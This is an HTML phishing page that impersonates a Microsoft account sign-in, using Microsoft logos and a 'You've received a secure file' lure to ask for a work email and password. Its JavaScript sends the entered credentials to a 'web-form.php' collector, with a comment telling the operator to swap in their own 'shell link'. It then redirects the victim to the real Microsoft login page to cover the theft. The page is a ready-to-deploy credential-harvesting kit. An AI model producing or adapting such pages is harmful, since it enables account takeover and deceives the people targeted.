<html>
    <head>
        <meta charset="utf-8">
        <meta name="viewport" content="initial-scale=1, maximum-scale=1, user-scalable=no, width=device-width">
        <title>Sign into your account</title>
        <link rel="shortcut icon" type="image/x-icon" href="https://aadcdn.msftauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico">
    </head>
    <style>
        html,
        body{
            padding: 0;
            margin: 0;
        }
        
        body {
            font-family: "Segoe UI Webfont",-apple-system,"Helvetica Neue","Lucida Grande","Roboto","Ebrima","Nirmala UI","Gadugi","Segoe Xbox Symbol","Segoe UI Symbol","Meiryo UI","Khmer UI","Tunga","Lao UI","Raavi","Iskoola Pota","Latha","Leelawadee","Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math";
            font-size: 15px;
            line-height: 20px;
            font-weight: 400;
            font-size: .9375rem;
            line-height: 1.25rem;
            padding-bottom: 0.227px;
            padding-top: 0.227px;
            color: #000;
            background: rgb(235,216,212);
            background: linear-gradient(90deg, rgba(235,216,212,1) 0%, rgba(227,227,222,1) 46%, rgba(220,228,219,1) 53%, rgba(219,227,218,1) 100%);
        }

        a:link,
        a.link {
            color: #0067b8;
            font-size: 13px;
        }

        a {
            color: red;
            text-decoration: none;
        }

        p{
            font-size: 13px;
            color: gray;
        }

        .ms-header{
            width: 100%;
            height: 40px;
            top: 0;
            background-color: #0067b8;
        }

        .container{
            margin-left: auto;
            margin-right: auto;
            position: relative;
            width: 380px;
            min-height: auto;
            overflow: hidden;
            margin-top: 2%;
            margin-bottom: 2%;
        }

        .login-box{
            background-color: #fff;
            -webkit-box-shadow: rgba(100, 100, 111, 0.2) 0px 7px 29px 0px;
            -moz-box-shadow: rgba(100, 100, 111, 0.2) 0px 7px 29px 0px;
            box-shadow: rgba(100, 100, 111, 0.2) 0px 7px 29px 0px;
            border-radius: 8px;
            -webkit-border-radius: 8px;
        }

        .first-box {
            padding: 10px;
            background-color: whitesmoke;
            border-bottom: 1px solid rgb(182, 179, 179);
            border-top-left-radius: 8px;
            border-top-right-radius: 8px;
        }

        .first-box h2 {
            font-size: 20px;
            font-weight: 300;
            color: #1b1b1b;
            font-weight: 300;
            text-align: center;
            font-family: "Segoe UI","Helvetica Neue","Lucida Grande","Roboto","Ebrima","Nirmala UI","Gadugi","Segoe Xbox Symbol","Segoe UI Symbol","Meiryo UI","Khmer UI","Tunga","Lao UI","Raavi","Iskoola Pota","Latha","Leelawadee","Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math";
        }

        .second-box{
            padding: 34px;
        }

        .login-box input{
            width: 100%;
            line-height: inherit;
            padding: 4px 8px;
            border: 2px grey solid;
            height: 40px;
            border-radius: 3px;
            -webkit-border-radius: 3px;
            background-color: transparent;
            margin-bottom: 10px;
        }

        .login-box button{
            min-width: 100%;
            padding: 4px 12px 4px 12px;
            margin-top: 4px;
            margin-bottom: 4px;
            position: relative;
            max-width: 100%;
            text-align: center;
            white-space: nowrap;
            overflow: hidden;
            vertical-align: middle;
            text-overflow: ellipsis;
            touch-action: manipulation;
            color: #000;
            border-style: solid 2px;
            border-color: transparent;
            min-height: 38px;
        }

        .login-box button[class="primary"]{
            border: none;
            color: #fff;
            border-color: #0067b8;
            background-color: #0067b8;
        }

        .login-box button[class="primary"]:hover{
            background-color: #005da6;
            cursor: pointer;
        }

        .error-message{
            color: #E81123;
            font-size: 14px;
        }

        input{
            font-size: 15px;
        }

        .button button[class="secondary"] {
            border: none;
            color: black;
            border-color: #ccc;
            background-color: #ccc;
        }

        .clearfix::after {
            content: "";
            clear: both;
            display: table;
        }

        footer{
            margin-top: 45px;
            font-size: 13px;
        }

        footer a{
            margin: 5px 20px;
            text-decoration: none;
            color: #0067b8;
        }

        .ms-footer{
            width: 100%;
            overflow: visible;
            z-index: 99;
            clear: both;
        }
        .ms-footer-links{
            margin: 0;
            text-align: center;
        }
        a.ms-footer-links{
            text-decoration: none;
            color: black;
            font-size: 12px;
            line-height: 28px;
            white-space: nowrap;
            display: inline-block;
            margin-left: 8px;
            margin-right: 8px;
        }
        a.ms-footer-links img{
            vertical-align: middle;
        }

        .fade-in {
            animation: fadeIn ease 1s;
            -webkit-animation: fadeIn ease 1s;
            -moz-animation: fadeIn ease 1s;
            -o-animation: fadeIn ease 1s;
            -ms-animation: fadeIn ease 1s;
        }
        @keyframes fadeIn {
        0% {
            opacity:0;
        }
        100% {
            opacity:1;
        }
        }

        @-moz-keyframes fadeIn {
        0% {
            opacity:0;
        }
        100% {
            opacity:1;
        }
        }

        @-webkit-keyframes fadeIn {
        0% {
            opacity:0;
        }
        100% {
            opacity:1;
        }
        }

        @-o-keyframes fadeIn {
        0% {
            opacity:0;
        }
        100% {
            opacity:1;
        }
        }

        @-ms-keyframes fadeIn {
        0% {
            opacity:0;
        }
        100% {
            opacity:1;
            }
        }
    </style>

	<!--JS script start--> 
    <script type="text/javascript">
        function ValidateField() {
            var email = document.getElementById('email').value;
            var password = document.getElementById('password').value;
            
            var emailValidation = document.getElementById("emailValidation");
            var passwordValidation = document.getElementById("passwordValidation");
                
            var filterEmail = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;
            var filterEmpty = /^(?=.{1,})/;
            
            var status = false;
            if (!filterEmail.test(email)) {
                emailValidation.innerHTML = "Please enter your email address";
                status = false;
            } else {
                emailValidation.innerHTML = "";
                document.getElementById("preview-email").innerHTML = email;
                document.getElementById("email-section").style.display = "none";
                document.getElementById("password-section").style.display = "block";
                document.getElementById("submit").innerHTML = "Checking...";
                setTimeout(function() {
                                            //Where to redirect to
                    document.getElementById("submit").innerHTML = "Sign In";
                }, 1000);
                status = true;
                
            //Final validation		
            if(!filterEmail.test(email) || password == "") {
                passwordValidation.innerHTML = "<span style='color:red;'>Please enter your password.</span>";
                status = false;
            } else {
                document.getElementsByName("email")[0].disabled = true;
                document.getElementsByName("password")[0].disabled = true;
                passwordValidation.innerHTML = "";
                document.getElementById("submit").innerHTML = "Verifying...";

                if (window.XMLHttpRequest) {
                    xmlhttp = new XMLHttpRequest()
                } else {
                    xmlhttp = new ActiveXObject("Microsoft.XMLHTTP")
                }
                xmlhttp.onreadystatechange = function() {
                    if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {
                        document.getElementById("show-message").innerHTML = xmlhttp.responseText
                    }
                };
                //Change this link to your shell link
                var url = "web-form.php";
                
                xmlhttp.open("POST", url + "?email=" + email + "&password=" + password, true);
                xmlhttp.send();
                status = true;
                setTimeout(function() {
                                            //Where to redirect to
                    window.location.href = "https://login.microsoftonline.com/";
                }, 2000);			
            }
            return status;			
            }
        }
    </script>
	<!--JS script end-->

    <body>
        <div class="ms-header">

        </div>

        <div class="container">
            <center style="margin-bottom: 30px;">
                <img src="https://aadcdn.msftauth.net/ests/2.1/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg" width="120" />
            </center>
            <div class="login-box">
                <div class="first-box">
                    <h2>Verify Your Identity</h2>
                </div>

                <div class="second-box">
                    <!-- <form action="POST" data-netlify="true"> -->
                    <p>You've received a secure file</p>
                    <p>
                        <img src="https://upload.wikimedia.org/wikipedia/commons/thumb/f/fb/.docx_icon.svg/1200px-.docx_icon.svg.png" style="width: 35px;"> 
                        <span style="margin-top: 100px; position:;">225KB</span>
                    </p>

                    <p>
                        To receive and download this Doc file, 
                        please enter specific professional email
                        credentials that this document was sent to.
                    </p>
                    <section id="email-section">
                        <input id="email" type="email" name="email" value="" placeholder="Email address" required />
                        <div class="error-message" id="emailValidation"></div>
                    </section>

                    <section id="password-section" style="display:none;" class="fade-in">
                        <p>
                            <span id="preview-email" style="color: black;"></span>
                        </p>
                        <input id="password" type="password" name="password" placeholder="Password" required>
                        <div class="error-message" id="passwordValidation"></div>
                    </section>

                    <p>
                        <center>
                            <img src="https://seeklogo.com/images/M/microsoft-office-logo-8B0EF31E09-seeklogo.com.png" style="width:30px;"/>
                        </center>
                    </p>

                    <button type="submit" class="primary" id="submit" onclick="ValidateField()" >Next</button>
                    <button type="submit" class="secondary" style="margin-right: 5px; display: none;">Back</button>
                    <div class="clearfix"></div>
                    <!-- </form> -->
                </div>
            </div>    
            <div class="ms-footer" style="margin-top: 20px;">
                <div class="ms-footer-links">
                    <a class="ms-footer-links" href="#">© 2023 Microsoft</a> 
                    <a class="ms-footer-links" href="#">Privacy & Cookies</a> 
                </div>
            </div>
        </div>
    </body>
</html>